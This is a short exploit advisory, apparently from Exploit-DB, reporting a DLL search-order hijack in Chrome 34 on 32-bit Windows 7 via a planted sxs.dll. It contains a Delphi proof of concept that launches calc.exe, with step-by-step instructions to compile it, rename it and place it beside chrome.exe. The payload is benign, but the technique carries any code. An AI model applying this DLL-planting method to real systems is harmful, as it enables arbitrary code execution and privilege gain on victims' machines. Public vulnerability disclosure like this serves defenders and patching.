# google chrom latest Version 34.0.1847.131 m 32-bit DLL Order Hijacking
#
###########################
#
# Exploit Title: [google chrom Version 34.0.1847.131 m 32-bit DLL Order Hijacking ]
# Date: [2014/04/25]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.chromium.org/]
# Software Link: [http://www.filehorse.com/download-google-chrome/]
# Version: [Version 34.0.1847.116 32-bit ]
# Tested on: [Windows 7 Ultimate - 32bit]
#
###########################
details:
Untrusted search path vulnerability in chrom latest version [34.0.1847.131] when running on Windows 7 32bit ,allows local users and possibly remote attackers to gain privileges via a Trojan horse DLL in the current working directory by sxs.dll
it's a DLL Order Hijacking that let me to execute arbitrary code beside google chrome latest version of Chrome suffers from Load Order Hijacking of "Sxs.dll" library, I attached a proof of concept code that will runs besides your google chrome if you put it beside chrome.exe & it works like a charm & will execute calc .
uses
Windows;
begin
Winexec(PAnsichar('C:\WINDOWS\system32\calc.exe'),sw_show);
end.
Compile Above Source Code With Delphi And Rename Compiled DLL To sxs.dll Then Copy It To The chrom Installed Path, Now If You Run The chrom now DLL Will Hijacked!